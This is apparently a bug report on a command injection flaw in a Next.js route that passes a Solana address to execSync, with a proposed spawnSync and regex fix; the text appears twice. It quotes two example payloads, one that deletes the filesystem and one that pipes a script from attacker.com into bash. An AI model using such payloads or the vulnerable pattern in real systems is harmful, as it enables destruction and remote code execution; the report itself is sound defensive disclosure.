Summary
User input is directly interpolated into shell commands in API routes, creating a critical command injection vulnerability.
Affected Files
src/app/api/start-round/route.ts (lines 61-72)- Other API routes with similar patterns
Problem
// Dangerous pattern - user input directly in shell command
const result = execSync(`solana account ${accountAddress}`, { encoding: 'utf-8' });An attacker could inject malicious commands via crafted account addresses like:
; rm -rf / # or $(curl attacker.com/shell.sh | bash)
Impact
- Severity: CRITICAL
- Remote code execution on server
- Full system compromise
- Data theft/destruction
Proposed Fix
- Validate input against strict regex pattern for Solana addresses
- Use array-based spawn() instead of string-based execSync()
- Never interpolate user input into shell commands
// Safe pattern
import { spawnSync } from 'child_process';
function isValidSolanaAddress(address: string): boolean {
return /^[1-9A-HJ-NP-Za-km-z]{32,44}$/.test(address);
}
if (!isValidSolanaAddress(accountAddress)) {
return NextResponse.json({ error: 'Invalid address' }, { status: 400 });
}
const result = spawnSync('solana', ['account', accountAddress], { encoding: 'utf-8' });Labels
bug, critical
Summary
User input is directly interpolated into shell commands in API routes, creating a critical command injection vulnerability.
Affected Files
src/app/api/start-round/route.ts(lines 61-72)Problem
An attacker could inject malicious commands via crafted account addresses like:
; rm -rf / #or$(curl attacker.com/shell.sh | bash)Impact
Proposed Fix
Labels
bug, critical